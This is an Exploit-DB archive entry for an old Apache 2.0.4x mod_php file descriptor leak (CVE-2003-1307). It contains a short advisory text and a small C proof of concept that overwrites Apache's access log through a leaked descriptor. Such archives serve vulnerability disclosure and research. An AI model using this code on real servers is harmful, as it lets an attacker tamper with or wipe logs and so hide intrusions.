Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability 2

2003-12-26T00:00:00
ID EDB-ID:23482
Type exploitdb
Reporter frauk\x41ser
Modified 2003-12-26T00:00:00

Description

Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2). CVE-2003-1307. Local exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/9302/info
 
Reportedly, the Apache mod_php module may be prone to a vulnerability that may allow a local attacker to gain access to privileged file descriptors. As a result, the attacker may pose as a legitimate server and possibly steal or manipulate sensitive information.

# apache's access_log can be overwritten with arbitrary content
# from PHP called executables.
# POC by frauk\x41ser && sk0L / SEC Consult 2006

#include <unistd.h>
#include <fcntl.h>

#define LOGFD 7

void main(){
        fcntl(LOGFD, F_SETFL, O_WRONLY); // change mode from append to write
        lseek(LOGFD, 0, SEEK_SET); // reposition to start of file
        write(LOGFD,"hehe\n",5);
}